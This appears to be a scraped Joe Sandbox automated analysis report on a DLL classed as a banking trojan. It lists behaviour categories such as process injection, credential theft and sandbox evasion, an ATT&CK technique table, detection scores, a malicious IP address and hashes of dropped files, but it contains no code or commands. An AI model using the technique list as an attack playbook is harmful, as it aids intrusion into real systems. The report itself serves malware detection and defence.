Source: | Check user administrative privileges: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_00B5591B |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_00B55A14 | |
Source: | Code function: | 2_2_00B5FCC0 | |
Source: | Code function: | 2_2_00B5CE21 |
Source: | Code function: | 2_2_00B5A513 |
Source: | Process queried: | Jump to behavior | ||
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 2_2_00B5BE55 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | |||
Source: | Memory written: |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | |||
Source: | Memory protected: |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 2_2_048912D3 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 2_2_04895410 |
Source: | Code function: | 2_2_048912D3 |
Source: | Code function: | 2_2_00B54DF5 |
Source: | Code function: | 2_2_0489515F |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 DLL Side-Loading | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 1 Access Token Manipulation | 1 File Deletion | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | 813 Process Injection | 1 Masquerading | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Valid Accounts | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 813 Process Injection | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
29% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
146.70.35.138 | unknown | United Kingdom | 2018 | TENET-1ZA | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 614013 |
Start date and time: 22/04/202218:10:41 | 2022-04-22 18:10:41 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | nhLAwAo49f (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@31/29@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173, 13.107.42.16
- Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 5520 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- VT rate limit hit for: nhLAwAo49f.dll
Time | Type | Description |
---|---|---|
18:12:12 | API Interceptor | |
18:13:23 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
146.70.35.138 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENET-1ZA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_843fd29667a3a8f656751f949c19ad5cff2ee117_7cac0383_1af40bd9\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.841963229435912 |
Encrypted: | false |
SSDEEP: | 96:xfHQ9nYysy9haSK7FISZpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSm9mBJ:xmniH0tGtjuq/u7sfS274Itb |
MD5: | B9F67E01D203683E89B26D078734FCFF |
SHA1: | 38E8B043716123B26DCC00B71D43F38010EE7327 |
SHA-256: | 3E241943DC4B98B263609B2F76F314FF9C4E0FA33AD75873B74987A28931C407 |
SHA-512: | 0F4C257BC53AA4FD58357E622660E4E9116D74554747CAEA6F3B3BE3B1388241F4C5F6FBDCD8035E4AEBE8286E370B4B4C880B8089BA7972D6C281F57973D7AA |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_ac76d3d55f42d8698d1e4b22618822dff34b96_7cac0383_13c853ce\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8456985887519763 |
Encrypted: | false |
SSDEEP: | 96:8lX5F8cT9nYy7y9haSKzfFEpXIQcQAc60cExcw32u+a+z+HbHgbAS/YyNlISWbSB:8V562naH+wL7juq/u7sES274ItW |
MD5: | 613F641A93068DBAB700946451ECE534 |
SHA1: | 9402807A974B4330A7989856A3821FAF99FA8E19 |
SHA-256: | 39F32A0664DFDDC05FC3EB61E99D44D6622F45778A6EBFAF2EBC9F0F8EDE9763 |
SHA-512: | E13D5BBE6195562BD08B6D70CCDDCC572100A898A02365FF35687C74142C5D840CF3B800FC62A872E4C8AC7043E1219BCF821E473CF46DE77A066784E50F1837 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_e912ab21695e486193197883960c42688442ed7_7cac0383_1b24250e\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.8482062576733173 |
Encrypted: | false |
SSDEEP: | 96:8DXQQFr9nYyCy9haot7Jn7YpXIQcQac6pcEccw35+a+z+HbHgbAS/YyNlISWbSmp:8zHTnwH0tGtjuq/u7sfS274ItW |
MD5: | C1804D727586FA03C9929BEA75F44214 |
SHA1: | 298A2AD8FC2D5F5E4E9D8ABE8B703704F50FA54D |
SHA-256: | 472C519A2F993185C462EDF506FFBD5E1C139AF94D473D21398BD6B4759EEECC |
SHA-512: | 8D1242B78A2812F9A65428E487627D748054AEEA58F5546332901995E710F3D1A7BC1EF36F5642CB10F2B25816452123DB9B9593AAC0B35BE8A60A37C6DCF56E |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 41922 |
Entropy (8bit): | 1.9480086397048668 |
Encrypted: | false |
SSDEEP: | 192:+5mBoTh5NijDLY+JWti4OrKBT6I7hb/3hQh70C/Vj92jI1GFIt:emsXuLWtSra2Iy0C/6Kt |
MD5: | 6A2C469E5D8EE98CEA5459F21EC0D3F8 |
SHA1: | 8CD453195450BB0A30A22B18001A6EB7B62C4921 |
SHA-256: | 4ECE87A3FBE22E8238A5C4A8EC0948384B4169D37063370CDE94C1FE207A42E8 |
SHA-512: | 7E16065D3B4A63948B8F1C1A665E7D7F8A110E2B59F418162E8731ADE683A19CC88EF8708CB0969D8A7484A85CDEF0E79E688E6D389D33016F95B35F0B3C5E6D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8336 |
Entropy (8bit): | 3.697730021064886 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNiv/6bu6YoOSUhRggmftSsmdCprn89b45XsfRK5m:RrlsNiX6i6YBSUhRggmftSsmdGcf1 |
MD5: | BAB16FAD64EE9DE354E6B613A2242979 |
SHA1: | 6DE0C93EDF2AB5560FEFFE9FE1F9D92D866CA392 |
SHA-256: | DD34B73EBA69F8B911431F65158281A0B1717DD54347A3F778BDB69D5DB95C73 |
SHA-512: | E9FB3069FB6C23047E7373D7B9F4EBFEA200EE3E593B7582598606D19D61B79503810AF355F174CAA7B7AE4167A83108ABA1C97B5B4DA9903CED321CF238F18A |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.473891299554449 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhD78fm8M4J2+uZFU+q849LwKcQIcQw02d:uITfIaUTgrsqY1D4J0YtwKkw02d |
MD5: | 5521F1C6007010E32F65281637389EF1 |
SHA1: | 3AF2C8760B50045A62C09CF6D65E84C93777C84F |
SHA-256: | E0B6D98ABA05B3403B3A298134F27F23E2C8ABB29C84791A29529AD951A3C20A |
SHA-512: | CD97F689042211C58C3FB656100B98D49636AA81C101548967D31F986B8AA0FD7DDE35E17391877C6EB68D00911CCB3E977DC3A6995D6585FD082595FB5528D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 54966 |
Entropy (8bit): | 2.1904283410365792 |
Encrypted: | false |
SSDEEP: | 192:K5/sh5NijDiD3n6OrKBzruwBVxFIv393F9/KLYmCuwGCoVwsL1bUOI7cSh/bk7jA:aEXuiTFrauwfU93u7VL1bpI5aj4zR |
MD5: | D29BCF861DE82B8EF2C4B4CB236F4A14 |
SHA1: | CF3CB6B882FD00135558486890E2B4DCB676F503 |
SHA-256: | 41AAF6549F2CA0993B996D9535E38E78DBD198924DF704212700DC4430AAE38B |
SHA-512: | 3D04A4615689CB00DD12DC116532D430253CE57E5CC00606984185C2B41C6556650D033260947435A7B4FCE63429891D81F2E9D838065E939F9D6ABE0CF1DE8F |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 42122 |
Entropy (8bit): | 1.9777565374307426 |
Encrypted: | false |
SSDEEP: | 192:6542pth5NijDW2gOrKBKyI7hb/3h/bZ7Jg+yT5luen5:qHXuWsrazIDdJg+qn |
MD5: | D8C861E1784A220342495A141161646D |
SHA1: | D41096C4809F4AFC6C982C6AD9B028C7E63D871D |
SHA-256: | 8E50BC2DDE9F7A843352923361DFDE1204862BCDF523883B8AE9EFB664A8074A |
SHA-512: | BD7FE851328BE59B0BEEE6650888081D79394EC0A032D5A9CE4774BD096799D5D26EFC516A20130A7C5684E437976C135E8D5B6390504F441D0AE2963256CC27 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8294 |
Entropy (8bit): | 3.696880610282114 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNivU6Tu6YoHSUOkgmf8SgmdCpD989bHXsfVRtm:RrlsNiM6a6YoSUOkgmf8SgmPHcfVS |
MD5: | 4E8276566E0F5F4EE2DE9AF2FC1F9583 |
SHA1: | 9EFE009956124EDD248AC50DA59609C809CA343F |
SHA-256: | 175493C9030215AB5B987D34933B81EEA550C6C55A5943E0A938C6BFA7ED4927 |
SHA-512: | 611D905E4E80FE660EA4BC3402B7F059B69B25B02A41E704D7A56972DF96323FEF3AB3749AC3A12F509883F518AA26239AD05FF30B88729105C205BD5AC49C17 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4564 |
Entropy (8bit): | 4.442194983388651 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsBJgtWI9giUyWgc8sqYjhsJ8fm8M4J2+bFFu+q84WsKcQIcQw02d:uITfTaUTgrsqY1RJE/Kkw02d |
MD5: | 006D1060A3B9C817E7E32CB0AF1113C6 |
SHA1: | CFCD05DD725D3B3A012AA6B830FFFA42A5DE845F |
SHA-256: | 7E5D75DCDDC63D8A2A43DF40F87B4DFF54B75B4B540EEF13721B21D7515DD827 |
SHA-512: | 47A39188FD3CAB32D8680AF4D51CD41AE5FDE78AE7062DAC07B97A243AF86C27CF403F9EA8FBE614F7A0FDB6521BDF745AFECF7307E1E3E06C5999ACE88511AB |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8352 |
Entropy (8bit): | 3.69147029511001 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNivo6Fu6Yo8SURqzpagmfHSsmdCpNA89bKX1f0GOm:RrlsNiw6s6YDSU4zpagmfHSsmuKlfj |
MD5: | E368C3045276EBF134B315BD5D8EF7DB |
SHA1: | A436C80D93157A854DB88E7E2F7D38BF3126786B |
SHA-256: | 535294B083E9C5C219F8866B8FA1F7A6FFB849E2BDEB4C016378FEA28312BD48 |
SHA-512: | 2947061FBE9446DE17EC165FEE2B329C1F689A520F972AD982B4C84064246CE6986A509137CBF2130AB5237148E6D1BBE8C48789E348A087AB4E683CC2BF8BBF |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4665 |
Entropy (8bit): | 4.429165137940979 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs/iJgtWI9giUyWgc8sqYjhE8fm8M4J2+AFXy+q8vQ+9KcQIcQw0Hd:uITfIaUTgrsqY1pJIyKpKkw0Hd |
MD5: | 94ECB0DA39C39AB28AA13B51A4DB3BB8 |
SHA1: | 39A6B932C82740AE346C82E2AE9DF7845314111C |
SHA-256: | 78AFEE5C62B29D412B5C91DB1263E2EB057968688F7FA4D308AB8336A0D8D078 |
SHA-512: | B76C30F4C6740FE12A21D863AB68E7B35DB2C6890B30DD9F64911A8EC0E670208D0E4FAE058C742DAF8F8AFD19862B74221826D3FCE95EA0A48E74CA22130003 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1332 |
Entropy (8bit): | 3.9920012545315475 |
Encrypted: | false |
SSDEEP: | 24:Hve6zW9NKrrOuHFhKdNII+ycuZhNtakSbPNnq92d:PSKrSuTKdu1ulta3Rq9G |
MD5: | 9DE94FD3F34A6169E6324C66FF77C906 |
SHA1: | 7F571FE5F120D2E0CD51403DE13472DD1560A4AC |
SHA-256: | 97E062CCF0173420D01EC0CEEE1D77241EACA5BA6F81AA4EDC3C52032863DA23 |
SHA-512: | 371F5B070E73B96CA218C25EB972D72EE668190077A90521E71D96E8EB9F1935F9544FB2B91A0B9FED40C9AFAA853B34CEA4640654EA0F33E4A94D10D2C3EA84 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1332 |
Entropy (8bit): | 4.00763306842418 |
Encrypted: | false |
SSDEEP: | 24:HNzW9NhhZ8xuHfQhKdNII+ycuZhNXakSZPNnq92d:Ehh2xuaKdu1ulXa3bq9G |
MD5: | 6D7A47645190CE81FA9272663BB066B9 |
SHA1: | 79E7D6F114861BE379EACF2CAB653FC0E5694B21 |
SHA-256: | 3D846BF40B7AE12970AFD5E48C749ACF0619045C17194DCCFDE8D8533DB9FED7 |
SHA-512: | A7D776C98716A09C1B3C86F622FBC8ACEEDFD40B3C570525CF1CE57DF8B7BA9B32766AFE8A655A08AE0E88ADF7375F5E2E4E49E5CBF2D5DA5C6E5CA760CB6E80 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1053216887427664 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqbPN5Dlq5J:+RI+ycuZhNtakSbPNnqX |
MD5: | 80E5570291184688A869DEE161E23D8E |
SHA1: | 6803FA57ED622585EE8629C641C943D5303F7502 |
SHA-256: | E2600F55D8FEF33F62C87CDBC3ED97EB6833A1665918EBCCEADCD40F16B029D7 |
SHA-512: | C1B9957D45F2E7CEC4C533285B3D380AC354B677DE6B8FA2D679718010811F5D36B9D83D8EBB3A65920DC93254184AA83A9BB59A598EBE4D1F54DD67272F16AB |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
